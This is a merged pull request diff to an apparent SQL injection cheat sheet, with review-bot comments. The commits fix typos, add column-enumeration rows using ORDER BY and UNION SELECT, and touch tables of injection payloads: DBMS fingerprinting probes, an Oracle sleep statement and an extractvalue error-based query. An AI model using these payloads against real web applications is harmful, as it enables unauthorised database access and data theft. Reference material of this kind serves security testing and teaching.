Merged
Changes from 4 commits
2 changes: 1 addition & 1 deletion _data/injectionDescriptions.yml
@@ -1,7 +1,7 @@
injectionDetection: Injections can be detected in a number of ways. The simplest being adding a <code>'</code> or <code>"</code> after various parameters and getting a database error returned from the web server. The sections below describe where to find and how to detect these parameters.
dbmsIdentification: Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.
errorBased: Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.
unionBased: Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns).
unionBased: Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns). You can try to enumerate the amount of columns using error based enumeration (see error based injection).
blindBased: Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.
conditionalStatements: Conditional statements are beneficial for creating complex queries and aiding in Blind Injection.
injectionPlacement: SQL injection is always a hassle when it isn't apparent where the injection is taking place. It is helpful to have a few ways to exploit injections in various parts of the query.
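Review bot: the sentence added to the `unionBased` entry says "amount of columns"; columns are countable, so this should read "number of columns". The same sentence sends the reader to the error-based section for column enumeration, but this data file is keyed by injection type rather than by DBMS, so the reference will show on every DBMS page, while the ORDER BY / UNION SELECT rows in this PR are only added to injectionTypes/errorBased/mysql.html. Either add equivalent rows to the other DBMS pages or qualify the reference, e.g. "(see error based injection, MySQL)".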
2 changes: 1 addition & 1 deletion dbmsIdentification/mysql.html
Expand Up @@ -22,7 +22,7 @@ <h3 id="sql-injection-detection">DBMS Identification</h3>
<td>page.php?id=' 'mysql' -- </td>
</tr>
<tr>
<td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name.</i></td>
<td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name.</i></td>
<td>page.php?id='</td>
</tr>
</tbody>
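Review bot: the correction to "error messages" is right, but the identical note text is duplicated verbatim across mysql.html, oracle.html and sqlserver.html (the same one-word fix is repeated in the next two hunks). Consider moving this string into _data/injectionDescriptions.yml, which this PR already edits, so that future corrections are made in one place instead of three.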
2 changes: 1 addition & 1 deletion dbmsIdentification/oracle.html
Expand Up @@ -19,7 +19,7 @@ <h3 id="sql-injection-detection">DBMS Identification</h3>
<td>page.jsp?id='UNION SELECT 1 FROM v$version -- </td>
</tr>
<tr>
<td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name.</i></td>
<td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name.</i></td>
<td>page.jsp?id='</td>
</tr>
</tbody>
2 changes: 1 addition & 1 deletion dbmsIdentification/sqlserver.html
Expand Up @@ -19,7 +19,7 @@ <h3 id="sql-injection-detection">DBMS Identification</h3>
<td>page.asp?id=sql'; SELECT @@SERVERNAME -- </td>
</tr>
<tr>
<td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name.</i></td>
<td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name.</i></td>
<td>page.asp?id='</td>
</tr>
<tr>
2 changes: 1 addition & 1 deletion injectionTechniques/obfuscation/oracle.html
Expand Up @@ -55,7 +55,7 @@ <h3 id="obfuscating-queries">Obfuscating Queries</h3>
<td>SELECT 1 FROM dual -- comment</td>
</tr>
<tr>
<td>If statement</td>
<td>If Statement</td>
<td>BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;</td>
</tr>
<tr>
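Review bot: the change from "If statement" to "If Statement" is casing-only, and none of the other row labels of the Obfuscating Queries table are inside the hunk context (the only context cell shown, "SELECT 1 FROM dual -- comment", is a value cell, not a label). Please confirm that title case matches the remaining labels in this table; otherwise this edit introduces an inconsistency rather than fixing one.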
18 changes: 18 additions & 0 deletions injectionTypes/errorBased/mysql.html
Expand Up @@ -11,6 +11,24 @@ <h3>Error Based</h3>
</tr>
</thead>
<tbody>
<tr>
<td>Amount of columns using ORDER BY</td>
<td>ORDER BY 1
<br>
<em>Add this at the end of your query</em>
<em>If you get no error you know ordering is working</em>
<em>Increment the number from 1 until you get an error. Then you know the amount of columns for this table</em>
</td>
</tr>
<tr>
<td>Amount of columns using UNION SELECT</td>
<td>UNION SELECT 1,2
<br>
<em>Add this at the end of your query</em>
<em>Add increment until you see a valid response, e.g. UNION SELECT 1,2,3</em>
<em>If you get no error you know union select is working. You can try to find the values on the page to see where the output goes.</em>
</td>
</tr>
<tr>
<td>XML Parse Error</td>
<td>SELECT extractvalue(rand(),concat(0x3a,(select version())))</td>
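Review bot: the ORDER BY row mis-states the result: incrementing until an error means the first failing value is one past the last column, so the number of columns is the highest value that did not error (N-1 when ORDER BY N fails), not the value that produced the error; please reword "Then you know the amount of columns for this table" to say so, and change "Amount of columns" to "Number of columns" in both new row labels. In the UNION SELECT row, "Add increment until you see a valid response" reads as garbled; the e.g. implies "Add a column and increment until you see a valid response", and that hint should follow the "If you get no error" sentence so the steps are in order. On the markup: the three consecutive <em> elements in each new cell have no line break between them, so they will render as one run-on sentence; put a break after each, and use the self-closing <br/> form that the dbmsIdentification pages in this PR use rather than the bare <br>.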